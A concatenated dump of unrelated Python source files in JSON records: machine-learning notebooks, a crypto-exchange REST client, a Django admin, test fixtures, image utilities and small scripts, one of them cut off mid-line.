\ndataset['Partner'].unique() \n\ndataset['Dependents']= label_encoder.fit_transform(dataset['Dependents']) \ndataset['Dependents'].unique() \n\ndataset['StreamingMovies']= label_encoder.fit_transform(dataset['StreamingMovies']) \ndataset['StreamingMovies'].unique() \n\ndataset['Churn']= label_encoder.fit_transform(dataset['Churn']) \ndataset['Churn'].unique() \n\n\n# In[47]:\n\n\nX = dataset.iloc[:, [5,21]].values\ny = dataset.iloc[:, 20].values\ndataset.head()\n\n\n# In[48]:\n\n\n# Splitting the dataset into the Training set and Test set\n# from sklearn.cross_selection import train_test_split\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state = 0)\n\n\n# In[49]:\n\n\n# Feature Scaling\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nX_train = sc.fit_transform(X_train)\nX_test = sc.transform(X_test)\n\n\n# In[50]:\n\n\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import GridSearchCV\nKNN=KNeighborsClassifier()\n\n\n# # KNN\n\n# In[51]:\n\n\nparam_grid=[{'n_neighbors':[3,5,10,15]}]\ngrid_search_KNN=GridSearchCV(KNN,param_grid,cv=5)\ngrid_search_KNN.fit(X_train, y_train)\n\n\n# In[52]:\n\n\ngrid_search_KNN.best_params_\n\n\n# In[53]:\n\n\ncvres_KNN=grid_search_KNN.cv_results_\nfor mean_score,params in zip(cvres_KNN[\"mean_test_score\"],cvres_KNN[\"params\"]):\n print(mean_score,params)\n\n\n# In[54]:\n\n\n# Prediction with KNN classifier\n\nfrom sklearn.neighbors import KNeighborsClassifier\nclassifier1 = KNeighborsClassifier(n_neighbors = 15, metric='minkowski', p=2)\nclassifier1.fit(X_train, y_train)\n# Predicting the Test set results\ny_pred = classifier1.predict(X_test)\ndf=pd.DataFrame(y_pred)\n# Making the Confusion Matrix\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_test, y_pred)\nprint(\"confusion matrix:\")\nprint(cm)\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import classification_report\nprint('Accuracy Score: ',accuracy_score(y_test,y_pred))\nprint('--------------')\nprint(classification_report(y_test,y_pred))\n\n\n# In[55]:\n\n\ny_pred\n\n\n# # Random Forest\n\n# In[56]:\n\n\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn.metrics import roc_curve\nfrom sklearn.metrics import roc_auc_score\n\nRF=RandomForestClassifier(random_state=123)\n\n\n# In[57]:\n\n\nfrom sklearn.model_selection import GridSearchCV\nparam_grid=[{'n_estimators':[4,5,10,20,50]}]\ngrid_search_RF=GridSearchCV(RF,param_grid,cv=5)\ngrid_search_RF.fit(X_train, y_train)\n\n\n# In[58]:\n\n\ngrid_search_RF.best_params_\n\n\n# In[59]:\n\n\ncvres_RF=grid_search_RF.cv_results_\nfor mean_score,params in zip(cvres_RF[\"mean_test_score\"],cvres_RF[\"params\"]):\n print(mean_score,params)\n\n\n# In[60]:\n\n\n# Prediction with Random Forest classifier\nfrom sklearn.ensemble import RandomForestClassifier\nclassifier2 = RandomForestClassifier(n_estimators = 4, criterion='entropy', random_state = 0)\nclassifier2.fit(X_train, y_train) \n# Predicting the Test set results\ny_pred = classifier2.predict(X_test)\ndf=pd.DataFrame(y_pred)\n# Making the Confusion Matrix\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_test, y_pred)\nprint(\"confusion matrix:\")\nprint(cm)\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import classification_report\nprint('Accuracy Score: ',accuracy_score(y_test,y_pred))\nprint('--------------')\nprint(classification_report(y_test,y_pred))\n\n\n# # SVM\n\n# In[61]:\n\n\n# Prediction with SVM classifier\n# Fitting SVM to the Training set\nfrom sklearn.svm import SVC\nclassifier3 = SVC(kernel = 'linear', random_state = 0)\nclassifier3.fit(X_train, y_train)\n# Predicting the Test set results\ny_pred = classifier3.predict(X_test)\n# Making the Confusion Matrix\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_test, y_pred)\nprint(\"confusion matrix:\")\nprint(cm)\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import classification_report\nprint('Accuracy Score: ',accuracy_score(y_test,y_pred))\nprint('--------------')\nprint(classification_report(y_test,y_pred))\n\n\n# # Decision Tree\n\n# In[62]:\n\n\n# Prediction with Decision Tree classifier\nfrom sklearn.tree import DecisionTreeClassifier\nclassifier4 = DecisionTreeClassifier(criterion='entropy', random_state = 0)\nclassifier4.fit(X_train, y_train) \n# Predicting the Test set results\ny_pred = classifier4.predict(X_test)\n# Making the Confusion Matrix\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_test, y_pred)\nprint(\"confusion matrix:\")\nprint(cm)\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import classification_report\nprint('Accuracy Score: ',accuracy_score(y_test,y_pred))\nprint('--------------')\nprint(classification_report(y_test,y_pred))\n\n\n# # Naive Bayes\n\n# In[63]:\n\n\n# Prediction with naive_bayes classifier\nfrom sklearn.naive_bayes import GaussianNB\nclassifier5 = GaussianNB()\nclassifier5.fit(X_train, y_train) \n# Predicting the Test set results\ny_pred = classifier5.predict(X_test)\n# Making the Confusion Matrix\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_test, y_pred)\nprint(\"confusion matrix:\")\nprint(cm)\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import classification_report\nprint('Accuracy Score: ',accuracy_score(y_test,y_pred))\nprint('--------------')\nprint(classification_report(y_test,y_pred))\n\n\n# # Plotting a bar Graph between the accuracy of all 3 algorithms :\n\n# In[64]:\n\n\nacc=[]\n\n\n# In[65]:\n\n\nacc.append(classifier1.score(X_test, y_test))\nacc.append(classifier2.score(X_test, y_test))\nacc.append(classifier3.score(X_test, y_test))\nacc.append(classifier4.score(X_test, y_test))\nacc.append(classifier5.score(X_test, y_test))\n\n\n# In[66]:\n\n\nacc_name=['KNN','Random Forest','SVM','Decision Tree','Naive Bayes']\n\n\n# In[67]:\n\n\ncolours=['b','r','g','c','m']\nplt.xlabel('machine learning algorithms',fontsize=15)\nplt.ylabel('Accuracy',fontsize=15)\nplt.title('Accuracy Comparisions',fontsize=15)\nplt.bar(acc_name,acc,color=colours,width=0.5)\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Predicting Telecom Churn/Telecom_Analysis(Using 2 Features).py","file_name":"Telecom_Analysis(Using 2 Features).py","file_ext":"py","file_size_in_byte":7052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"459150064","text":"#-*- coding: UTF-8 -*-\n\nimport numpy as np\n\nfrom IMaterial import IMaterial\n\nclass Color(IMaterial):\n\n\tdef __init__(self, r, g, b, a):\n\t\tself.__color = np.array((r,g,b,a), dtype=np.float32)\n\n\tdef get(self):\n\t\treturn self.__color\n\nColor.RED \t= Color(1,0,0,1)\nColor.GREEN = Color(0,1,0,1)\nColor.BLUE \t= Color(0,0,1,1)\nColor.WHITE\t= Color(1,1,1,1)\nColor.ROYALBLUE\t= Color(65/255.0,105/255.0,225/255.0,1)\nColor.BLACK = Color(0,0,0,1)","sub_path":"src/model/Color.py","file_name":"Color.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"465525827","text":"# For files submitted to Marx, data containing test cases should go\n# in a single list contained in a separate file. The list can contain\n# whatever you want it to contain, but everything has to be within\n# that one list. Marx will split that list when it distributes the\n# code to the Worker Machines for execution.\n\ndata = [\n (1, 2, 'alpha', 3.4, True),\n (5, 6, 'beta', 7.8, False),\n (9, 10, 'gamma', 11.12, True),\n (13, 14, 'delta', 15.16, False)\n]\n","sub_path":"example_1/data_file.py","file_name":"data_file.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"448404337","text":"from datetime import datetime\nimport random\n\nimport pymongo\nimport pytest\n\nfrom flaskr import create_app\nfrom flaskr.models import Song, db\n\nPOOL_ARTIST = [\n 'Bob', 'Pool', 'Alice', 'Joy'\n]\nTITLES = [\n 'Storytime',\n 'Adrenalize',\n 'Afterlife',\n 'Goodbye Moonmen'\n]\n\n\n@pytest.fixture\ndef random_song_generator():\n def generator():\n song = Song(\n artist=random.choice(POOL_ARTIST),\n title=random.choice(POOL_ARTIST),\n difficulty=random.uniform(0, 15),\n level=random.randint(0, 15),\n released=datetime.now().replace(microsecond=0),\n )\n song.save()\n return song\n\n return generator\n\n\n@pytest.fixture\ndef client():\n app = create_app(test_config={\n 'MONGOALCHEMY_DATABASE': 'test_db',\n 'TESTING': True,\n })\n client = app.test_client()\n\n db.session.db.Song.remove()\n db.session.db.Song.create_index(\n [('artist', pymongo.TEXT), ('title', pymongo.TEXT)]\n )\n yield client\n","sub_path":"integration_tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"483210395","text":"import numpy as np\nimport scipy.misc\nfrom glob import glob\nimport fnmatch\nimport time\nimport os\n\n\ndef center_crop(image, input_h, input_w, resize_h, resize_w):\n h, w = image.shape[:2]\n j = int(round((h - input_h)/2.))\n i = int(round((w - input_w)/2.))\n return scipy.misc.imresize(image[j:j+input_h, i:i+input_w], [resize_h, resize_w])\n\n\ndef make_generator(pathnames, n_files, batch_size, crop=True):\n epoch_count = [1]\n def get_epoch():\n images = np.zeros((batch_size, 3, 64, 64), dtype='int32')\n files = np.arange(n_files)\n random_state = np.random.RandomState(epoch_count[0])\n random_state.shuffle(files)\n epoch_count[0] += 1\n for n, i in enumerate(files):\n image = scipy.misc.imread(\"{}\".format(pathnames[i]))\n \n if crop:\n image = center_crop(image, 178, 178, 64, 64)\n else:\n image = scipy.misc.imresize(image, [64, 64])\n \n images[n % batch_size] = image.transpose(2,0,1)\n if n > 0 and n % batch_size == 0:\n yield (images,)\n return get_epoch\n\ndef load(batch_size, data_dir, crop=True):\n pathnames_train = glob(os.path.join(data_dir, 'train', '*.jpg'))\n pathnames_val = glob(os.path.join(data_dir, 'test', '*.jpg'))\n\n return (\n make_generator(pathnames_train, len(pathnames_train), batch_size, crop=crop),\n make_generator(pathnames_val, len(pathnames_val), batch_size, crop=crop)\n )\n\nif __name__ == '__main__':\n train_gen, valid_gen = load(64)\n t0 = time.time()\n for i, batch in enumerate(train_gen(), start=1):\n #print(\"{}\\t{}\".format(str(time.time() - t0), batch[0][0,0,0,0]))\n if i == 1000:\n break\n t0 = time.time()\n","sub_path":"igul222_GANs/tflib/load_celebA.py","file_name":"load_celebA.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"90025705","text":"import requests\nimport time\nimport datetime\nimport hashlib\nimport hmac\nimport base64\nimport json\nfrom enum import Enum\n\nfrom decimal import Decimal\nfrom .version import __version__ as version\n\nagent = requests.Session()\n\n\nclass OrderType(Enum):\n MARKET = 'market_order'\n LIMIT = 'limit_order'\n\n\nclass TimeInForce(Enum):\n FOK = 'fok'\n IOC = 'ioc'\n GTC = 'gtc'\n\n\nclass DeltaRestClient:\n\n def __init__(self, base_url, api_key=None, api_secret=None):\n self.base_url = base_url\n self.api_key = api_key\n self.api_secret = api_secret\n\n # Check if payload and query are working\n def request(self, method, path, payload=None, query=None, auth=False):\n url = '%s/%s' % (self.base_url, path)\n if auth:\n if self.api_key is None or self.api_secret is None:\n raise Exception('Api_key or Api_secret missing')\n timestamp = get_time_stamp()\n signature_data = method + timestamp + '/' + path + \\\n query_string(query) + body_string(payload)\n signature = generate_signature(self.api_secret, signature_data)\n req_headers = {\n 'api-key': self.api_key,\n 'timestamp': timestamp,\n 'signature': signature,\n 'User-Agent': 'rest-client',\n 'Content-Type': 'application/json'\n }\n else:\n req_headers = {'User-Agent': 'rest-client'}\n\n res = requests.request(\n method, url, data=body_string(payload), params=query, timeout=(3, 27), headers=req_headers\n )\n\n res.raise_for_status()\n return res\n\n def get_product(self, product_id):\n response = self.request(\"GET\", \"products\")\n response = response.json()\n products = list(\n filter(lambda x: x['id'] == product_id, response))\n return products[0] if len(products) > 0 else None\n\n def batch_create(self, product_id, orders):\n response = self.request(\n \"POST\",\n \"orders/batch\",\n {'product_id': product_id, 'orders': orders},\n auth=True)\n return response\n\n def create_order(self, order):\n response = self.request('POST', \"orders\", order, auth=True)\n return response.json()\n\n def batch_cancel(self, product_id, orders):\n response = self.request(\n \"DELETE\",\n \"orders/batch\",\n {'product_id': product_id, 'orders': orders},\n auth=True)\n return response.json()\n\n def batch_edit(self, product_id, orders):\n response = self.request(\n \"PUT\",\n \"orders/batch\",\n {'product_id': product_id, 'orders': orders},\n auth=True\n )\n return response.json()\n\n def get_orders(self, query=None):\n response = self.request(\n \"GET\",\n \"orders\",\n query=query,\n auth=True)\n return response.json()\n\n def get_L2_orders(self, product_id, auth=False):\n response = self.request(\"GET\", \"orderbook/%s/l2\" %\n product_id, auth=auth)\n return response.json()\n\n def get_ticker(self, symbol):\n response = self.request(\n \"GET\", \"/products/ticker/24hr\", query={'symbol': symbol})\n return response.json()\n\n def get_wallet(self, asset_id):\n response = self.request(\"GET\", \"wallet/balance\",\n query={'asset_id': asset_id}, auth=True)\n return response.json()\n\n def get_price_history(self, symbol, duration=5, resolution=1):\n if duration/resolution >= 500:\n raise Exception('Too many Data points')\n\n current_timestamp = time.mktime(datetime.datetime.today().timetuple())\n last_timestamp = current_timestamp - duration*60\n query = {\n 'symbol': symbol,\n 'from': last_timestamp,\n 'to': current_timestamp,\n 'resolution': resolution\n }\n\n response = self.request(\"GET\", \"chart/history\", query=query)\n return response.json()\n\n def get_price_history_by_time(self, symbol, start_time, end_time, resolution=1):\n # if duration/resolution >= 500:\n # raise Exception('Too many Data points')\n\n # current_timestamp = time.mktime(datetime.datetime.today().timetuple())\n # last_timestamp = current_timestamp - duration*60\n query = {\n 'symbol': symbol,\n 'from': start_time,\n 'to': end_time,\n 'resolution': resolution\n }\n\n response = self.request(\"GET\", \"chart/history\", query=query)\n return response.json()\n\n def get_mark_price(self, product_id, auth=False):\n response = self.get_L2_orders(product_id, auth=auth)\n return float(response['mark_price'])\n\n def get_leverage(self):\n raise Exception('Method not implemented')\n\n def get_position(self, product_id):\n response = self.request(\n \"GET\",\n \"positions\",\n auth=True)\n response = response.json()\n if response:\n current_position = list(\n filter(lambda x: x['product']['id'] == product_id, response))\n return current_position[0] if len(current_position) > 0 else None\n else:\n return None\n\n def set_leverage(self, product_id, leverage):\n response = self.request(\n \"POST\",\n \"orders/leverage\",\n {\n 'product_id': product_id,\n 'leverage': leverage\n },\n auth=True)\n return response.json()\n\n def change_position_margin(self, product_id, delta_margin):\n response = self.request(\n 'POST',\n 'positions/change_margin',\n {\n 'product_id': product_id,\n 'delta_margin': delta_margin\n },\n auth=True)\n return response.json()\n\n def cancel_order(self, product_id, order_id):\n order = {\n 'id': order_id,\n 'product_id': product_id\n }\n response = self.request('DELETE', \"orders\", order, auth=True).json()\n return response\n\n def place_stop_order(self, product_id, size, side, stop_price=None, limit_price=None, trail_amount=None, order_type=OrderType.LIMIT, isTrailingStopLoss=False):\n order = {\n 'product_id': product_id,\n 'size': int(size),\n 'side': side,\n 'order_type': order_type.value,\n 'stop_order_type': 'stop_loss_order',\n }\n if order_type.value == 'limit':\n if limit_price is None:\n raise Exception('limit_price is nil')\n\n order['limit_price'] = str(limit_price)\n\n if isTrailingStopLoss is True:\n if trail_amount is None:\n raise Exception('trail_amount is nil')\n order['trail_amount'] = str(\n trail_amount) if side == 'buy' else str(-1 * trail_amount)\n else:\n if stop_price is None:\n raise Exception('stop_price is nil')\n order['stop_price'] = str(stop_price)\n response = self.create_order(order)\n return response\n\n def place_bracket_order(self, product_id, size, side, limit_price=None, time_in_force=None, order_type=OrderType.LIMIT, post_only='false', client_order_id=None, take_profit_price=None, trail_amount=None):\n order = {\n 'product_id': product_id,\n 'size': int(size),\n 'side': side,\n 'order_type': order_type.value,\n 'post_only': post_only,\n \"bracket_order\": {\"stop_loss_price\": \"\", \"take_profit_price\": take_profit_price, \"trail_amount\": trail_amount}\n\n }\n print('order', order)\n if order_type.value == 'limit_order':\n order['limit_price'] = str(limit_price)\n\n if time_in_force:\n order['time_in_force'] = time_in_force.value\n\n if client_order_id:\n order['client_order_id'] = client_order_id\n\n response = self.create_order(order)\n return response\n\n def place_order(self, product_id, size, side, limit_price=None, time_in_force=None, order_type=OrderType.LIMIT, post_only='false', client_order_id=None):\n order = {\n 'product_id': product_id,\n 'size': int(size),\n 'side': side,\n 'order_type': order_type.value,\n 'post_only': post_only,\n }\n if order_type.value == 'limit_order':\n order['limit_price'] = str(limit_price)\n\n if time_in_force:\n order['time_in_force'] = time_in_force.value\n\n if client_order_id:\n order['client_order_id'] = client_order_id\n\n response = self.create_order(order)\n return response\n\n def get_assets(self):\n response = self.request('GET', 'assets')\n return response.json()\n\n def get_all_products(self):\n response = self.request('GET', 'products')\n return response.json()\n\n def order_history(self, page_num=1, page_size=100):\n response = self.request(\n 'GET',\n 'orders/history',\n query={\n 'page_num': page_num,\n 'page_size': page_size\n },\n auth=True\n )\n return response.json()\n\n def fills(self, page_num=1, page_size=100):\n response = self.request(\n 'GET',\n 'fills',\n query={\n 'page_num': page_num,\n 'page_size': page_size\n },\n auth=True\n )\n return response.json()\n\n\ndef create_order_format(price, size, side, product_id, post_only='false'):\n order = {\n 'product_id': product_id,\n 'limit_price': str(price),\n 'size': int(size),\n 'side': side,\n 'order_type': 'limit_order',\n 'post_only': post_only\n }\n return order\n\n\ndef cancel_order_format(x):\n order = {\n 'id': x['id'],\n 'product_id': x['product']['id']\n }\n return order\n\n\ndef round_by_tick_size(price, tick_size, floor_or_ceil=None):\n remainder = price % tick_size\n if remainder == 0:\n price = price\n if floor_or_ceil == None:\n floor_or_ceil = 'ceil' if (remainder >= tick_size / 2) else 'floor'\n if floor_or_ceil == 'ceil':\n price = price - remainder + tick_size\n else:\n price = price - remainder\n number_of_decimals = len(\n format(Decimal(repr(float(tick_size))), 'f').split('.')[1])\n price = round(Decimal(price), number_of_decimals)\n return price\n\n\ndef generate_signature(secret, message):\n message = bytes(message, 'utf-8')\n secret = bytes(secret, 'utf-8')\n hash = hmac.new(secret, message, hashlib.sha256)\n return hash.hexdigest()\n\n\ndef get_time_stamp():\n d = datetime.datetime.utcnow()\n epoch = datetime.datetime(1970, 1, 1)\n return str(int((d - epoch).total_seconds()))\n\n\ndef query_string(query):\n if query == None:\n return ''\n else:\n query_strings = []\n for key, value in query.items():\n query_strings.append(key + '=' + str(value))\n return '?' + '&'.join(query_strings)\n\n\ndef body_string(body):\n if body == None:\n return ''\n else:\n return json.dumps(body, separators=(',', ':'))\n","sub_path":"delta_history/delta/delta_rest_client.py","file_name":"delta_rest_client.py","file_ext":"py","file_size_in_byte":11379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"312606210","text":"from django.contrib import admin, message\nfrom django.utils.translation import gettext, gettext_lazy as _\nfrom django.conf import settings\nfrom ..models import ReadLine\nfrom django.core.mail import send_mail\n\nclass ReadLineAdmin(admin.ModelAdmin):\n fieldsets = [\n (None, {'fields': ('name', 'factory')}),\n ]\n\n exclude = ['last_login']\n\n list_display = ['name', 'factory', 'company', 'login_at', 'cloudkey']\n\n list_filter = [\n ('factory__company', admin.RelatedOnlyFieldListFilter),\n ('factory', admin.RelatedOnlyFieldListFilter)\n ]\n\n def getBody(self, queryset):\n s = \"\"\n for e in queryset:\n s += 'Reading Line: '+e.name+ ', Cloudkey: '+e.cloudkey+'\\n'\n return s\n \n def send_email(self, request, queryset):\n subject = 'CloudKey Change'\n message = self.getBody(queryset)\n email_from = settings.EMAIL_HOST_USER\n recipient_list = [request.user.email, ]\n \n try:\n send_mail(subject, message, email_from, recipient_list)\n self.message_user(request, f'An email to {request.user.email} has been successfully sent')\n except: #SMTPAuthenticationError\n self.message_user(request, 'There was a problem sending the email, contact with the Administrator', level=messages.ERROR)\n \n send_email.short_description = \"Send CloudKey to my email\"\n actions = [send_email]\n\n ## Overriden methods\n def get_readonly_fields(self, request, obj=None):\n ret = []\n # Set readonly when object is already created\n if obj is not None:\n ret.extend(['factory'])\n return ret\n\n def get_formsets_with_inlines(self, request, obj=None):\n for inline in self.get_inline_instances(request, obj):\n # Hide inlines on add\n if obj is not None:\n yield inline.get_formset(request, obj), inline\n\n def company(self, obj):\n return obj.factory.company\n\n\nclass ReadLineInline(admin.TabularInline):\n model = ReadLine\n extra = 0\n can_delete = False\n readonly_fields = ['name', 'login_at']\n exclude = ['cloudkey', 'stationid']\n\n ## Overriden methods\n def has_add_permission(self, request, obj):\n return False\n","sub_path":"Cloud/web/partners/admin/readline.py","file_name":"readline.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"135150013","text":"class Asset:\n def __init__(self, tag, mac, sn, mn, owner):\n self.AssetTag = tag\n self.MacAddress = mac\n self.SerialNumber = sn\n self.ModelNumber = mn\n self.Owner = owner\n\n def toString(self):\n rtnStr = \"{0}\\n\\tSerial Number: {1}\\n\\tModel Number: {2}\\n\\tMac Address: {3}\\n\\tOwner: {4}\"\n return rtnStr.format(self.AssetTag, self.SerialNumber, self.ModelNumber, self.MacAddress, self.Owner)\n\n","sub_path":"Week 08/AssetTracking/AssetTracking/Asset.py","file_name":"Asset.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"112891862","text":"trans = {'0':'ling', '1':'yi', '2':'er', '3':'san', '4': 'si', '5':'wu', \n '6':'liu', '7':'qi', '8':'ba', '9':'jiu', '10': 'shi', '100': 'bai'}\n\n\n\ndef speak_Chinese(number):\n if number != int(number) or not 0<=int(number)<=999:\n print('无效号码。 请输入0到999之间的整数.')\n else: \n intnumber = number\n number = str(number)\n if 0<=intnumber<=10:\n return trans[number]\n if 11<=intnumber<=19:\n return '{} {}'.format(trans['10'],trans[number[1]])\n if 20<=intnumber<=99:\n if number[1] == '0':\n return '{} {}'.format(trans[number[0]],trans['10']) \n else:\n return '{} {} {}'.format(trans[number[0]],trans['10'],trans[number[1]])\n if 100<=intnumber<=999:\n if number[1]=='0' and number[2]!='0':\n return '{} {} {} {}'.format(trans[number[0]],trans['100'],trans['0'],trans[number[2]])\n if number[2]=='0' and number[1]!='0':\n return '{} {} {} {}'.format(trans[number[0]],trans['100'],trans[number[1]],trans['10'])\n if number[1]=='0' and number[2]=='0':\n return '{} {} '.format(trans[number[0]],trans['100'])\n else:\n return '{} {} {} {} {}'.format(trans[number[0]],trans['100'],trans[number[1]],trans['10'], trans[number[2]])\n# For testing\ndef main():\n print(speak_Chinese(36))\n print('In Chinese: 36 = san shi liu')\n print(speak_Chinese(20))\n print('In Chinese: 20 = er shi')\n print(speak_Chinese(16))\n print('In Chinese: 16 = shi liu')\n print(speak_Chinese(200))\n print('In Chinese: 200 = er bai')\n print(speak_Chinese(109))\n print('In Chinese: 109 = yi bai ling jiu')\n print(speak_Chinese(999))\n print('In Chinese: 999 = jiu bai jiu shi jiu')\n\nif __name__ == '__main__':\n main()\n","sub_path":"exam_p1.py","file_name":"exam_p1.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"47608199","text":"from PIL import Image, ImageDraw, ImageFont, ImageFilter, ImageOps\nfrom plugins import resources, tarot, playing\n\n\ndef concat(image_list):\n widths, heights = zip(*( img.size for img in image_list))\n width = sum(widths)\n height = max(heights)\n\n canvas = Image.new('RGBA', (width, height), (255,255,255,0))\n offset = 0\n for image in image_list:\n canvas.paste(image, (offset, 0))\n offset += image.size[0]\n return canvas\n\ndef margin(image, size):\n canvas = Image.new('RGBA', tuple([ o + m * 2 for o, m in zip(image.size, size) ]), (255, 255, 255, 0))\n canvas.paste(image, size)\n return canvas\n\ndef set_size(image, size):\n canvas = Image.new('RGBA', size, (255, 255, 255, 0))\n canvas.paste(image, tuple([ (c - o) // 2 for o, c in zip(image.size, size) ]))\n return canvas\n\ndef bgcolor(image, color):\n canvas = Image.new('RGBA', image.size, color)\n canvas = Image.alpha_composite(canvas, image)\n return canvas\n\ndef text_at_center(canvas, text, fontfile='materials/font.otf', fontsize=18):\n image_w, image_h = canvas.size[0] * 4, canvas.size[1] * 4\n image = Image.new('RGBA', (image_w, image_h), (255,255,255,0))\n draw = ImageDraw.Draw(image)\n\n draw.font = ImageFont.truetype(fontfile, fontsize * 4)\n lines = text.splitlines()\n ws, hs = [s for s in zip(*[draw.font.getsize(line) for line in lines])]\n text_w, text_h = max(ws), sum(hs)\n\n for row,line in enumerate(lines):\n position = (image_w - ws[row])/2, (image_h - text_h)/2 + hs[row] * row\n draw.text(position, line, (0, 0, 0, 255))\n\n img = image.resize((image_w//4, image_h//4), Image.ANTIALIAS)\n canvas.paste(img, (0,0))\n return canvas\n\n\ndef dropshadow(image, border=5):\n img = ImageOps.invert(image.split()[3]).convert(\"RGBA\")\n img = margin(img, (border, border))\n for n in range(3):\n img = img.filter(ImageFilter.BLUR)\n img = Image.alpha_composite(img, margin(image, (border,border)))\n return img\n\ndef create_single_tarot_image(card, text=None):\n fontsize = 18 if isinstance(card, tarot.MinorArcana) else 16\n image = concat([resources.tarot_blank, resources.tarot_blank])\n image = text_at_center(image, text or card.info_rows, fontsize=fontsize)\n image = set_size(image, (160, 150))\n image = concat([dropshadow(card.image), image])\n image = bgcolor(set_size(image, resources.canvas_size), resources.bg_color)\n return image\n\ndef create_triple_tarot_image(cards):\n image = dropshadow(concat([card.image for card in cards]))\n image = bgcolor(set_size(image, resources.canvas_size), resources.bg_color)\n return image\n\ndef create_playing_card_image(cards):\n image = concat([card.image for card in playing.Deck.sort(cards)])\n image = set_size(image, (420, 280))\n image = bgcolor(image, (38, 75, 31))\n return image\n\n","sub_path":"plugins/images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"418504134","text":"import pandas as pd \r\nimport random\r\nimport statistics\r\nimport csv\r\nimport plotly.figure_factory as ff \r\nimport plotly.graph_objects as go \r\ndf=pd.read_csv('medium_data.csv')\r\ndata=df['Math_score'].tolist()\r\nmean=statistics.mean(data)\r\nstd=statistics.stdev(data)\r\n\r\ndef randomSetOfMeans(counter):\r\n dataSet=[]\r\n for i in range(0,counter):\r\n randomIndex=random.randint(0,len(data)-1)\r\n value=data[randomIndex]\r\n dataSet.append(value)\r\n mean=statistics.mean(dataSet)\r\n return mean\r\n\r\nmeanList=[]\r\nfor i in range(0,1000):\r\n setOfMeans=randomSetOfMeans(100)\r\n meanList.append(setOfMeans)\r\nm1=statistics.mean(meanList)\r\ns1=statistics.stdev(meanList)\r\nprint(m1,s1)\r\n\r\n\r\nfsds,fsde=m1-s1,m1+s1\r\nssds,ssde=m1-2*s1,m1+2*s1\r\ntsds,tsde=m1-3*s1,m1+3*s1\r\ndf=pd.read_csv('data3.csv')\r\ndata=df['Math_score'].tolist()\r\nmean=statistics.mean(data)\r\nstd=statistics.stdev(data)\r\nfig=ff.create_distplot([meanList],['Student Marks'],show_hist=False)\r\nfig.add_trace(go.Scatter(x=[m1,m1],y=[0,0.17],mode='lines',name='mean'))\r\nfig.add_trace(go.Scatter(x=[mean,mean],y=[0,0.17],mode='lines',name='mean'))\r\nfig.add_trace(go.Scatter(x=[ssde,ssde],y=[0,0.17],mode='lines',name='stdev2end'))\r\nfig.add_trace(go.Scatter(x=[tsde,tsde],y=[0,0.17],mode='lines',name='stdev3end'))\r\nfig.show()\r\nzscore=(mean-m1)/std\r\nprint(zscore)\r\n","sub_path":"Project111.py","file_name":"Project111.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"451202353","text":"\nfrom datetime import datetime, timedelta\nimport pandas as pd\nimport numpy as np\nfrom ipdb import set_trace\n\n#print(pd.Timestamp(datetime.today()).strftime('%Y-%m-%d'))\n\n\n\nt = pd.DataFrame()\nt['a'] = [1,2,6,2,3,6,1,4]\nt['b'] = [3,4,5,2,3,4,4,5]\nt = t.groupby('a')\nt = t.get_group(1)\nprint(t)\nset_trace()\nprint(t.std()['a'])\n#t = np.matrix([[1,2,3],[1,2,3],[2,3,4],[3,6,7]])\nt = np.matrix(t)\nprint(np.shape(t))\nprint(np.cov(t.T))\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"59099561","text":"import argparse\n\nfrom keras.models import load_model\nimport pickle\nimport threading\nfrom time import sleep\nimport os\n\nfrom predictPlayNN import connectAndPlay\nfrom championship_manager import Championship\nfrom neuro_evolution.genetic_algorithm import evolve\n\n\ndef loadModels(folder, generation, playersNumber):\n # blackModel = {\"id\": (from, to), ...}\n blackModel = {}\n whiteModel = {}\n\n genStr = str(generation)\n\n for i in range(playersNumber):\n blackModel[genStr + \"_\" + str(i)] = (\n load_model(folder + genStr + \"/black/modelFB_\" + genStr + \"_\" + str(i), compile=False),\n load_model(folder + genStr + \"/black/modelTB_\" + genStr + \"_\" + str(i), compile=False)\n )\n 